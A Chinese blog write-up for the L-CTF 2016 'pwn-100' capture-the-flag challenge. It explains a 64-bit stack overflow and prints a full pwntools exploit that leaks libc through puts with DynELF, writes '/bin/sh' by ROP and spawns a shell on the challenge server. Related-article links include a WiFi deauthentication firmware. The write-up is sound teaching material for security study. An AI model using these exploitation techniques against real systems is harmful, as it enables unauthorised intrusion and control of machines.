pwn-100(L-CTF-2016)--write up

最新推荐文章于 2022-01-20 21:44:50 发布
最新推荐文章于 2022-01-20 21:44:50 发布
阅读量933 收藏 5
点赞数 21
分类专栏: CTF-PWN # 攻防世界-pwn -- WriteUp 文章标签: CTF PWN 栈溢出 漏洞抵用 攻防世界
本文为ATFWUS原创,允许转载,但请附上作者署名和本文链接
本文链接:https://blog.csdn.net/ATFWUS/article/details/104791561
版权

文件下载地址:

链接:https://pan.baidu.com/s/1SkbJmjnCtZETaafLEIUuLQ
提取码:wjb0

前言:风萧萧兮雨萧萧,忆君兮,不知。

0x01.分析

checksec:

分析源码:

发现主要功能在sub_40063D,我们分析一下该函数,发现,该函数的功能是:向v1写满200字节,且一定要写满200字节才结束循环,发现v1是0x40,很明显栈溢出。

漏洞利用:

无system,无libc,无/bin/sh,但溢出函数可以循环利用,所以考虑使用DynELF泄露system的地址。

由于是64位程序,所以传参的时候要先考虑前六个寄存器,可以利用的函数为puts,但是要注意puts函数的特殊性,会受到/x00的影响,所以要进行一些特殊的处理。

为了将leak函数的address作为参数给puts,所以首先要,找到一个pop rdi,ret的小片段。

ROPgadget --binary pwn-100  --only 'pop|ret' | grep 'rdi'
0x0000000000400763 : pop rdi ; ret

得到system的地址后要向一个可写的地址写入/bin/sh,首先需要找到一个可写的地址。

vmmap
0x400000           0x401000 r-xp     1000 0      /home/atfwus/pwn/pwn-100
0x600000           0x602000 rw-p     2000 0      /home/atfwus/pwn/pwn-100

这里选用0x601000。

在写入/bin/sh和get shell的时候都需要用到64位常用的rop片段。

0x02.exp

##!/usr/bin/env python
from pwn import*

r=remote("111.198.29.45",52760)
#r=process('./pwn-100')
elf=ELF('./pwn-100')

rop1=0x40075A #6_pop_ret
rop2=0x400740 #rdx(r13) rsi(r14) edi(r15d)
pop_rdi=0x400763
start_addr=0x400550
puts_plt=elf.plt['puts']
read_got=elf.got['read']
binsh_addr=0x601000
fillchar='A'*0x48

def leak(address):
    payload=fillchar
    payload+=p64(pop_rdi)
    payload+=p64(address)
    payload+=p64(puts_plt)
    payload+=p64(start_addr)
    payload=payload.ljust(200,'A')
    r.send(payload)
    r.recvuntil("bye~\n")
    count=0
    content=''
    up=''
    while True:
        c=r.recv(numb=1,timeout=0.5)
        count+=1
        if up == '\n' and c == '':
            content=content[:-1]+'\x00'
            break
        else:
            content+=c
            up=c
    content=content[:4]
    log.info("%#x => %s" % (address,(content or '').encode('hex')))
    return content

d=DynELF(leak,elf=elf)
system_addr=d.lookup('system','libc')
print "system_addr", hex(system_addr)

print "----------write /bin/sh to bss----------"
payload=fillchar
payload+=p64(rop1)
payload+=p64(0)
payload+=p64(1)
payload+=p64(read_got)
payload+=p64(8)
payload+=p64(binsh_addr)
payload+=p64(1)
payload+=p64(rop2)
payload+='A'*56
payload+=p64(start_addr)
payload=payload.ljust(200,'A')
r.send(payload)
r.recvuntil("bye~\n")
r.send("/bin/sh\x00")

print "-----------get shell----------"
payload=fillchar
payload+=p64(pop_rdi)
payload+=p64(binsh_addr)
payload+=p64(system_addr)
payload=payload.ljust(200,'A')
r.send(payload)

r.interactive()

0x03.未解决的问题

本地开启交互无法执行指令是咋回事??????

ATFWUS
关注
  • 21
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF writeup
08-10
CTF writeup masterCTF write ups from the vulnhub CTF team
南邮CTF密码学write up
dianzhao6995的博客
10-12 394
南邮CTF练习平台网址:http://ctf.nuptzj.cn/challenges# 1.esay! base64解密不解释 nctf{this_is_base64_encode} 2.KeyBoard 在键盘上按字母画画可得areuhack 注意格式得到 nctf{areuhack} 3.base全家桶 base有64,32,16三种加密,按顺序来...
CTF PWN-攻防世界XCTF新手区WriteUp
道阻且长,行则将至。
10-20 9291
文章目录前言001 get_shell002 hello_pwn 前言 PWN 是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵。以上是从百度百科上面抄的简介,而我个人理解的话,应该就是向目标发送特定的数据,使得其执行本来不会执行的代码,前段时间爆发的永恒之蓝等病毒其实也算得上是 pwn 的一种。 CTFPWN 类型的题目的目标是拿到 flag,一般是在 linux 平台下通过二进制/系统调用等方式编
L-CTF2016 PWN200 writeup
哒君的博客
08-02 651
本以为已经可以做出题来了。。。没想到连利用点在哪都没看见 例行公事 居然什么保护都没开,有趣 利用点分析 v2位于rbp-0x30的位置,而name会读入0x30个字符,且如果读入0x30个字符的话末尾不会有\x00,这样在printf的时候就会顺带leak出rbp的值 id保存在rbp-0x38的位置 *buf在栈上的位置是rbp-0x40,dest在栈上的位置是rbp-0x8,但是b...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn-environment:使用docker的ctf-pwn环境
05-11
环境 使用docker的ctf-pwn环境
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:https://blog.csdn.net/A951860555/article/details/112849849
简单的练手栈溢出pwn100-附件资源
03-02
简单的练手栈溢出pwn100-附件资源
sharif ctf pwn suctfdb writeup
charlie_heng的专栏
02-04 612
这两天打了一下sharif ctf,比赛平台居然在打着打着的时候被墙…… 这题一拿到的时候真的一脸懵逼,python??? so??? 后面静下心来,仔细看了下,发现漏洞多得不得了。。。。 其实主要内存操作都在so里面,所以结合着python代码和so来看就可以了 因为这题可以任意写db的内容,所以可以实现,写任意地址,读任意地址,控制流劫持 虽然有这么多东西,但是利用起来还是有点麻烦的
redpwnCTF 2020 pwn部分writeup
SkYe's Blog
06-25 833
coffer-overflow-0 分析 保护情况 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 漏洞函数 题目给了程序源代码,但是我们还是按照正常题目做法分析二进制文件。 漏洞就在 main 中,gets 函数存在栈溢出: int __cdecl main(int argc, const char **
UNCTF pwn部分writeup
sea_time的博客
11-16 427
UNCTF pwn babyrop(栈溢出) 解题过程 首先覆盖变量,然后开启后门,然后通过后门函数来libc leak,然后再次回到后门函数,再次跳转到libc空间执行system("/bin/sh"),需要注意的是,对ret地址进行了check,所以先跳到ret上,然后通过check再到libc空间。 IDA打开 程序很简单 int __cdecl main() { char buf; /...
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2489
这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到题目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3187
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
pwn-100(xctf)
weixin_43868725的博客
05-24 395
0x0 程序保护和流程 保护: 流程: main() sub_40068E() sub_40063D() 通过程序流程我们可以看出在sub_40068E()调用sub_40063D()时发生了栈溢出。 0x1 利用过程 1.这个程序没有system()函数,也没有"/bin/sh"。但是我们程序运行的时候需要libc。而libc中有我们需要的system(),所以我们只需要确定libc的基地址就可以知道system()。这里给出两种方法获取libc的基地址。第一种是pwntools自带的DynELF
LCTF-学习-MISC100-200
Kn1ght_Gin的博客
10-25 1147
开始一本正经水CTF,先从刷writeup开始。本次学习对象是刚刚结束的LCTF,参考AAA的writeup,自己动手重现破解过程,并记录知识点。 0x0 MISC100: 类型: 读取图片中的内容,获取AES初始秘钥,在函数中经过一定的重新置换,获取最终秘钥。要求输入EditText内容经秘钥加密后,与给定的new byte[] { 21, -93, -68, -94, 86, 1
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATFWUS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值